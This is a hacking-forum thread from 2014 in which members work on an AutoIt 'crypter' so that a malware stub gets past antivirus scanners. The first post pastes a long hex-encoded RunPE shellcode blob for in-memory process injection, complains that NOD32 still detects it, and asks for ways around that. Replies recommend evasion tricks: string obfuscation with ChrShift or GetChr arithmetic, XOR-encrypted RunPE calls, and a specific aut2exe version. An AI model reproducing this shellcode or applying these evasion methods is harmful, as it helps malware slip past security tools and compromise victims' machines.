mark_deno Posted July 14, 2014 Share Posted July 14, 2014 (edited) i currently work on autoit crypter source ( scantime) so i eddit it with new encryption TEA AND RUNPE(FOR RUNTIME) result is 5/60 nod32 keep catching this part on my shellcode runpe $sShellCode = '0xB9B600305835353842454300383143343030464402460000353335363537003634384230353330290300384200784305143030' & _ '03006C000C3430313838390034354643433634351045373437020E38353001020E393431333343305F0242009A014E0182002433031635C4303700' & _ '3F353544004B000BD8433839000B042930002301170237006334453835463600373235433436333344443200453832300021440246009344414331' & _ '45330030323033434238428037393043303337011900413146334135444500373735334238413528463033020F38000F3338004134463037334134' & _ '40444539373532801C340838323487293033444229812836368075398002334368313033815F31802F815F30A04642374339803D31823D48313842' & _ '809633378086380180284634454230343440323445373541828B424246838F43303635818F4388313734820332344482034833364682033436830B' & _ '3592378313363682AF4337841B8838343882133936318203A8413645820342841B4384179244841745348313463082CBD44143834341840F41006E' & _ 'C10F244146C3214230C321423149C3134232C3214233C315424234C31542353436C10D42A8363639C20137C40738C407243934C2254241C3294242' & _ '5236C2394243C40744C325421645C325004D41C111393837DDC24B394083C203C43739C40F001B11C233394437C23339453529C2213946C32141C4' & _ '57413191C311413234C25541330052A1C0A941343533C1154180B929C2013636C30337C363413895C41139C34141C41F4142C329243838C31B3839' & _ 'C30938419C3732C111C09EC26D3843C34B243844C33D3845C345384649C33B3930C3033931C4013289C3193933C321393434C27D48393537C27939' & _ '36C11D3863408341E74646354047400336774303C11E4003374303412440033877C406C023400339C4064015400341B74303C1E8400342A301A408' & _ '43A30167E1116003A2814646A112A00145276403A308830146372227383025E4003123483832233C383339233E3834231CA00823253637C9224638' & _ '37231B3634C309E1527D802B35A3016108A001E51C621936EDE41C35A301E41C36E0242005E41CFD631936E41CA408E41C21322005E51CFBA308E4' & _ '1C3460196003E51C6046A001ED431146216CA01730C301E144A0016631A301230C37326403621137B633A401220C37E41BA31D356403B1A1503835' & _ '356403A30835641F6D230C35641FA31D35653C220C35EF653C202AA0086A3C35651FE0646003DB651F621135641FA31D35653CA21D5E35651FE076' & _ 'E006431846631136FB641FE31436641F2154A024651F220CB636E41BA31D346518E214346518EDA248346518222F34E53763036518F16086383534' & _ '651863036418E32276346518E222346418A340842B46DFA42B6518E322E537A216356418A116F360D9647E4542A11FE001007C617C544544637645' & _ '647A4562AA38AC3533E41AA32A336A33336A33DA336A3333E41A632C33E41AA315B633E41A237533EA1A442C462375FE34E51AE328E51A63256533' & _ '630304077FE175A02AC4237149D000B427731B3275740A34B06738F071C320F30632DB750A721432F517721432740A7403DB3424734933750AB220' & _ '33740A931AF633740A133A33750A9302740A5143B7B016740A530B33F425308944700A6D540B35D18990783510073035342B3288320130128B45B2' & _ '00453001707D313338344435410030463835453530311BF18E507E351202008038423581C00438443034303251041A445190355000700335303476' & _ '35F291B00343808AB20350084444344652104242340494430036303431383030343042383346301F508236382044343542469F0A4333A991014143' & _ '9F0143E00A30350A117006303346B2173530366241D09B464433F10E202A37F43835350834809B7509552A9F05F13107383531742BF001580CD305' & _ 'DB110630003474001207383F083008CBD10BB07C30710045411418600B99906B35469018B00642341114EF30A5409E901899074614045076321A06' & _ '46701097033641343036F770146315711A44F118D005330DD3007F5F055305305BB423D302B905109D38DF110B210D7805001ED1003030AD5701BB' & _ 'FF05120A38130271A1806D3654AB3C4334E06F50AB11A656253035A646500C7219424490A545D0ABA03844313439700043F0ADBD38274430B1802D' & _ '7028C02935B1019C303131B2C0B111033131320141F21435323334303020308E4331015B155030383433D1A848424243F0213038332A30B7A00A51' & _ '2FB11C367436DF11433029FF21103303F101D0055440322791B1361D2531334451B23232D03638353E42B4063106D66FDF1D3F0635317B3B06C019' & _ '34F564FF0330085D09351646403D90174540144332' how to pass this can i use M3 alternative shellcode ;================================= ; Autor M3 ; Alternative Shell Execute AutoIt ; Agradecimientos Black Zerox ; Uso : sShell(Ruta + exe) ;================================= Func sShell($Path) Local $Shell = ObjCreate("shell.application") $Shell.ShellExecute($Path, "") EndFunc Edited July 14, 2014 by CrypterHacker Link to comment Share on other sites More sharing options...
0b3y Posted July 15, 2014 Share Posted July 15, 2014 Re: how to generate autoit shellcodes Ask This is the hidden content, please Sign In or Sign Up , he knows a lot about AutoIt crypting :tongue: Link to comment Share on other sites More sharing options...
chequinho Posted July 15, 2014 Share Posted July 15, 2014 Re: how to generate autoit shellcodes You're confusing Shellcode with ShellExecute function xD The code by M3 simply runs a file. Link to comment Share on other sites More sharing options...
DDoSer Posted July 15, 2014 Share Posted July 15, 2014 (edited) Re: how to generate autoit shellcodes i currently work on autoit crypter source ( scantime) so i eddit it with new encryption TEA AND RUNPE(FOR RUNTIME) result is 5/60 nod32 keep catching this part on my shellcode runpe how to pass this can i use M3 alternative shellcode ;================================= ; Autor M3 ; Alternative Shell Execute AutoIt ; Agradecimientos Black Zerox ; Uso : sShell(Ruta + exe) ;================================= Func sShell($Path) Local $Shell = ObjCreate("shell.application") $Shell.ShellExecute($Path, "") EndFunc chequinho rights, the code by M3 simply runs a file. To bypass memories operation in nod32 u can simply use ChrShift or GetChr with simple math. Here an example of GetChr with simple math (this method is used by RazorCrypt, but i some change it): This is the hidden content, please Sign In or Sign Up And ChrShift example: This is the hidden content, please Sign In or Sign Up My stub with encrypted RunPe dll calls with ChrShift and XOR encryption give this: [spoiler=Result] This is the hidden content, please Sign In or Sign Up Also, use 3.3.8.1 version of aut2exe. Edited July 15, 2014 by DDoSer Link to comment Share on other sites More sharing options...
Fcuk Posted July 30, 2014 Share Posted July 30, 2014 Re: how to generate autoit shellcodes Also, use 3.3.8.1 version of aut2exe. No don't some AVs have false positives on runtime against 3.3.8.1 Link to comment Share on other sites More sharing options...
Recommended Posts